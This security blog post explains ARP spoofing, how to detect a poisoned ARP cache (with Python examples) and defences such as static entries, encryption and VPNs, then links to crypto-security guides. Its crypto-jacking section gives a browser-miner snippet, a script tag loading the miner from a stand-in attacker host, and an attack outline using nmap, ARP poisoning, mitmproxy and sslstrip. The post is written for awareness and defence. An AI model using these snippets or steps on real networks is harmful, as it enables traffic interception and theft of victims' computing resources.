What is ARP spoofing and how to protect against it?
0xB25C
September 9th, 2022

Introduction

“Spoof” sounds like a sound effect for an airbag going off in a car or something. Sure, “spoofing” sounds like a funny word but when it comes to security it is anything but. It is the intentional act of camouflaging malicious actors and intent under the guise of legitimate behavior.

Spoofing is an advanced persistent threat and if you’re identified as a vulnerable target with multiple weak links and attack vectors, hackers will continue to come after you until you either give them an opening or close up your weaknesses.

It seems like hackers are coming up with new attack methods every single day and it’s hard to keep up with their endless creativity. Security researchers call it “creativity” because you have to have an inventive mind to search and think up new ways to exploit the vulnerable.

But how do you protect yourself from such an attack, and what is ARP spoofing actually used for? Let's find out!

The ARP Protocol

To understand how ARP spoofing works, we need a basic knowledge of the ARP protocol. Now, ARP stands for “address resolution protocol.” Everything dealing with sending data (packets) from one computer to another is governed by protocols, like this one.

ARP is the communication protocol that maps an IP address to a device's MAC address so that traffic can be delivered on the local network. For example, host A on a network wants to learn the MAC address that belongs to host B's IP address.

To do this, it broadcasts an ARP request to all hosts on the local network. Host B answers with an ARP reply containing its MAC address, and the requesting host stores this mapping in its ARP cache, which works like a contact list.

This is where the attackers come in. Posing as host B, they send ARP replies to host A. Because ARP has no way to verify a reply, host A stores the attacker's MAC address in its ARP cache as the address of host B, and the attacker receives the messages intended for host B.

For a better understanding, let's look at this situation from another angle! Let's say you are an attacker. ARP spoofing is the act of intercepting traffic by linking your own MAC address to a legitimate IP address and sending ARP replies back to the computer that originally sent this traffic.

The point is to trick the original sender into thinking you (the attacker) are the intended recipient of this data. This way, the sender will continue to ship traffic to you and all of the precious data that comes with it.

If you choose to intercept the traffic, this is known as a MITM (man in the middle) attack, which allows you to view and/or manipulate the information you receive. There is a little more to this attack, but all you ultimately need to know is that ARP spoofing is essentially pretending to be the recipient of data that is not yours.
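The request/reply exchange and the cache update described above, as an added Python example (not code from the original post). It encodes ARP messages in their Ethernet/IPv4 wire format and shows that the cache simply stores whatever the reply claims; all addresses are constructed.

```python
import struct

# ARP message layout for Ethernet/IPv4 (RFC 826): a fixed 28-byte body.
ARP_FMT = "!HHBBH6s4s6s4s"
HTYPE_ETHERNET, PTYPE_IPV4 = 1, 0x0800
OP_REQUEST, OP_REPLY = 1, 2

def mac_to_bytes(mac: str) -> bytes:
    return bytes(int(x, 16) for x in mac.split(":"))

def bytes_to_mac(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)

def ip_to_bytes(ip: str) -> bytes:
    return bytes(int(x) for x in ip.split("."))

def bytes_to_ip(b: bytes) -> str:
    return ".".join(str(x) for x in b)

def build_arp(oper, sender_mac, sender_ip, target_mac, target_ip) -> bytes:
    """Encode one ARP message; a request carries an all-zero target MAC."""
    return struct.pack(ARP_FMT, HTYPE_ETHERNET, PTYPE_IPV4, 6, 4, oper,
                       mac_to_bytes(sender_mac), ip_to_bytes(sender_ip),
                       mac_to_bytes(target_mac), ip_to_bytes(target_ip))

def parse_arp(pkt: bytes) -> dict:
    """Decode the 28-byte ARP body into its fields."""
    htype, ptype, hlen, plen, oper, sha, spa, tha, tpa = struct.unpack(ARP_FMT, pkt[:28])
    if (htype, ptype, hlen, plen) != (HTYPE_ETHERNET, PTYPE_IPV4, 6, 4):
        raise ValueError("not an Ethernet/IPv4 ARP message")
    return {"oper": oper, "sender_mac": bytes_to_mac(sha), "sender_ip": bytes_to_ip(spa),
            "target_mac": bytes_to_mac(tha), "target_ip": bytes_to_ip(tpa)}

def learn(cache: dict, reply: dict) -> dict:
    """Cache update exactly as ARP does it: the sender's claim is stored unverified."""
    cache[reply["sender_ip"]] = reply["sender_mac"]
    return cache

def exchange():
    # Constructed addresses: host A asks who has host B's IP address.
    a_mac, a_ip = "aa:aa:aa:aa:aa:01", "192.0.2.10"
    b_mac, b_ip = "bb:bb:bb:bb:bb:02", "192.0.2.20"
    # The request is sent in an Ethernet frame to ff:ff:ff:ff:ff:ff (broadcast).
    request = build_arp(OP_REQUEST, a_mac, a_ip, "00:00:00:00:00:00", b_ip)
    # Host B answers directly to A, putting its own MAC in the sender field.
    reply = build_arp(OP_REPLY, b_mac, b_ip, a_mac, a_ip)
    cache = learn({}, parse_arp(reply))
    return parse_arp(request), parse_arp(reply), cache
```

Any host on the segment can produce a reply with the same layout, which is why the `learn` step is where poisoning succeeds.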

IP (internet protocol) spoofing is a little different. It is mostly used for denial-of-service attacks, in which an attacker forges source IP addresses on connection requests sent to a victim; the requests can never be completed, and they consume the victim's bandwidth.

This leads to all sorts of problems, like crashed websites, denied connections to streaming services etc. I recommend you watch this video on IP spoofing denial of service attacks to get a better understanding:

Spoofing or Impersonation?

Impersonation and spoofing are the two main forms of phishing attacks aimed at employees. While the two terms seem interchangeable, they refer to very similar but fundamentally different methods of attack. If it tricks a computer, it's a spoofing attack. If it tricks a human, it's an impersonation attack.

What is ARP spoofing used for?

For espionage, MITM and DoS attacks. Let us briefly discuss each of these:

  • Espionage - hackers simply watch the data stream between hosts A and B without changing it;

  • MITM attack or mediator attack - attackers change information before sending it to the target host;

  • DoS attack - cybercriminals block data transmission between two or more hosts.

❗️ ARP spoofing is not only used by hackers. It helps developers to debug network traffic and is also used by penetration testers to simulate ARP cache poisoning.

www.researchgate.net/figure/ARP-Cache-Poisoning-Man-In-The-Middle-Attack_fig1_251925083

Consequences of ARP spoofing-based attacks

If attackers are spying on the victim, conducting a MITM attack, or planning other attacks in the future, the victim may not even notice any consequences from the ARP spoofing. But once the hackers' end goal has been reached, they may try to overload the computer with malware or infect the system with ransomware.

With ARP spoofing, hackers gain access to victims' personal data. In addition, these attacks can be used to introduce malware.

How can I detect ARP spoofing?

To check whether your ARP cache has been poisoned, inspect the ARP cache itself; the operating system's own tools or any device configuration management software will do. If your ARP cache contains two IP addresses with the same MAC address, you may have fallen victim to an attack.

Attackers usually run spoofing software that sends ARP messages claiming their MAC address belongs to the default gateway's IP. You can also look through ARP traffic for unsolicited replies claiming ownership of your router's IP or MAC address. Such messages are almost always a sign of an ARP spoofing attack.
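The two cache checks just described, as an added Python example (not from the original post): it parses ARP table output, flags any MAC address claimed by more than one IP, and compares the gateway's cached MAC with a pinned known-good value. It accepts Linux `ip neigh` / `arp -an` and Windows `arp -a` lines alike; the sample output and the pinned MAC are constructed.

```python
import re
from collections import defaultdict

# One IPv4 address followed somewhere later by one MAC (aa:bb:.. or aa-bb-..),
# so the same regex covers Linux `ip neigh` / `arp -an` and Windows `arp -a`.
IPV4 = r"(\d{1,3}(?:\.\d{1,3}){3})"
MAC = r"((?:[0-9a-f]{2}[:-]){5}[0-9a-f]{2})"
LINE_RE = re.compile(IPV4 + r".*?" + MAC, re.IGNORECASE)

def parse_arp_table(text: str) -> dict:
    """Return {ip: mac}, MACs normalised to lowercase colon form; IPv6 rows are skipped."""
    table = {}
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if m:
            table[m.group(1)] = m.group(2).lower().replace("-", ":")
    return table

def find_shared_macs(table: dict) -> dict:
    """MACs claimed by more than one IP: the duplicate the text says to look for."""
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}

def check_gateway(table: dict, gateway_ip: str, pinned_mac: str):
    """(changed?, cached MAC) for the gateway versus a MAC recorded on a known-good day."""
    seen = table.get(gateway_ip)
    return seen is not None and seen != pinned_mac.lower(), seen

# Constructed `ip neigh` output: the gateway 192.0.2.1 now resolves to the MAC
# of the host at 192.0.2.77, the pattern a poisoned cache shows.
SAMPLE = """\
192.0.2.1 dev eth0 lladdr de:ad:be:ef:00:77 REACHABLE
192.0.2.20 dev eth0 lladdr 00:11:22:33:44:20 STALE
192.0.2.77 dev eth0 lladdr de:ad:be:ef:00:77 REACHABLE
fe80::1 dev eth0 lladdr 00:11:22:33:44:01 router REACHABLE
"""
PINNED_GATEWAY_MAC = "00:11:22:33:44:01"  # constructed known-good value

if __name__ == "__main__":
    t = parse_arp_table(SAMPLE)
    print("shared MACs:", find_shared_macs(t))
    print("gateway changed:", check_gateway(t, "192.0.2.1", PINNED_GATEWAY_MAC))
```

A shared MAC is not proof on its own (a router that proxies ARP for several addresses produces the same pattern), so treat the gateway comparison as the stronger signal.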

How to protect against ARP spoofing?

There are several tools to protect against ARP spoofing:

  • Static ARP entries are the simplest way to protect against ARP spoofing. Such an entry is added manually, and the device will not overwrite it from received ARP replies. Remember, this method is practical only for some entries (such as the default gateway address), and client hosts remain vulnerable to attack.

  • ARP request validation software. It validates IP/MAC address pairs and blocks responses that fail validation. Another kind of tool simply notifies the host of changes in its ARP cache.

  • Firewalls with packet filtering. They detect attempts to masquerade as another host by flagging packets sent from repeated addresses.

  • Encryption. This is the most important way to protect against an ARP attack. It makes ARP hacking much more difficult and prevents the hacker from reading the messages after they have been intercepted.

  • VPN. When you connect to a VPN, all your data goes through an encrypted tunnel, so an attacker who intercepts it on the local network cannot read it.

oreilly.com/library/view/ccna-security-210-260/9781787128873/7f056ffb-f601-4d5e-b0f5-39dcd8deb01d.xhtml

Finally, I would like to mention an unusual form of protection - simulating ARP spoofing on your own network to find weaknesses. Pen-test tools are widely available and easy to use, so this defensive strategy against ARP attacks has every right to exist.

Crypto-jacking via ARP Poisoning Attack on Wi-Fi Networks

In order to achieve this goal, it is necessary to use ARP poisoning so that the attacker’s computer (bad guy) is placed in the middle of the communication between the router and the users’ computers (the victims).

This is achieved by the attacker sending spoofed Address Resolution Protocol (ARP) messages to the network so that the attacker's MAC address is identified as the default gateway, i.e., the attacker's MAC address is associated with the IP address of the router. Once this is done, all Wi-Fi network traffic destined for the router's IP address is first sent to the attacker (Man-In-The-Middle).

Furthermore, before the ARP Poisoning attack, the attacker must configure an HTTP server on his computer, in order to serve his clients with a piece of code for illegal mining, e.g., through some APIs such as and:

<script>
var miner = new CRLT.Anonymous('YOUR_SITE_PUBLIC_KEY');
miner.start();
</script>

Positioned on the network, the attacker can actively intercept, analyze and change Wi-Fi network traffic. Using, for example, mitmproxy, it can act as an active Man-In-the-Middle and inject a line of code into the requests made by the victims. This line of code is a JavaScript tag that loads the code snippet shown above.

(source-code)
...
<script src="man-in-the-middle-IP/crypto-jacking.js"></script>
...
(source-code)

This type of attack works autonomously on a Wi-Fi network and is very easy to execute. For example:

  • Attacker obtains the IP of the router and victims by scanning the network (e.g., using nmap);

  • Configures IP routing and routing tables;

  • Configures the HTTP server to serve the script for illegal mining;

  • Runs the spoof ARP attack on the network (for all the victims);

  • Starts mitmproxy and injects the script into Wi-Fi network traffic.

For this setup to be fully functional, it would also be possible to include sslstrip as a way to change all types of Wi-Fi network traffic, namely HTTP and HTTPS requests.

Users who connect to such unprotected networks need to be aware of this. It is not a recent problem: the same scheme has been used for many years to steal passwords and sensitive content, and it is still widely used today in real-world attacks on computer networks.

Users are advised to be cautious when connecting to a network of this kind, and to pay careful attention to the CPU usage of their personal machine.

If your computer is an active node in this type of malicious setup, its CPU usage may be higher than normal. There are browser extensions, such as uBlock Origin, which identify and block this type of malicious script. Or try using a reliable VPN service, such as a Mullvad.net OpenVPN (oVPN) configuration!

Wi-Fi Security when holding Crypto assets. Special.

  1. Read this article: www.ledger.com/academy/security/hack

  2. Go through this awesome list: github.com/edelahozuah/awesome-wifi-security

  3. Test github.com/techge/wifi-arsenal

  4. If you are an IoT device owner, then carefully read github.com/nebgnahz/awesome-iot-hacks

  5. Which OS to choose? t.me/officer_cia/344

  6. BGP Hacking www.theverge.com/2018/4/24/17275982/myetherwallet-hack-bgp-dns-hijacking-stolen-ethereum

  7. MikroTik security: www.itdave.nl/mikrotik-router-seurity-hardening

  8. Check out: github.com/decalage2/awesome-security-hardening

Be aware of modern attack methods and carefully read my Guide and Compendium step by step. You don't need a deep understanding of exactly how hacks work, but it is important to know what it looks like to be a victim. Counter-OSINT is important here as well. Read more about it here and here.

Study threat modeling (2) (3) and list all possible threats, even those that seem crazy to you. Being suspicious is always a good thing. After all, fake news works best on those who carry it to their acquaintances, becoming a kind of donor.

It is the same with attacks: very often someone will try to hack you through your acquaintances, by pretending to be an acquaintance, or through the acquaintances themselves. Always keep this in mind. This world is cruel and dangerous.

If we finally want to give people the opportunity to be their own bank, we must realize that in this case people must be able to replace all those services and actions for which traditional banks get money.

Read:

I am not asking you to comply with all of this, but you must remember the main rule:

Your level of OpSec usually depends on your threat model and which adversary you're up against. So it's hard to define how good your OpSec is.

Awesome security guides to follow:

Anonymity:

• hackmd.io/YKjhguQES_KeKYs-v1YC1w?both

• anonymousplanet.org

• DeepWeb/DarkNet OpSec Guide 2022

Privacy:

• yawnbox.com/blog/how-to-use-an-ipad-as-a-secure-calling-and-messaging-device 

• seirdy.one/posts/2022/07/09/stylometric-fingerprinting-redux

• privacyguides.org

OpSec:

• telegra.ph/CIA-Officer--Monero-05-08

• github.com/OffcierCia/Crypto-OpSec-SelfGuard-RoadMap

• www.usenix.org/system/files/1401_08-12_mickens.pdf


The cover for this article was done by my good friend and artist — RegulLion. We know each other well, so in case I disappear, he'll have the exact details about me. Consider this my canary. In this article you will see other works of his; they have no scientific meaning, but I would like to include them to help you imagine what we are talking about more clearly and put you in the right frame of mind! Many thanks for the help with editing as well!

All proceeds will go to create a book about blockchain with a unique design:

Kogaan! Zu'u wah dein hin faraan! 🐉


If you want to support my work, please consider donating to me:


Sources

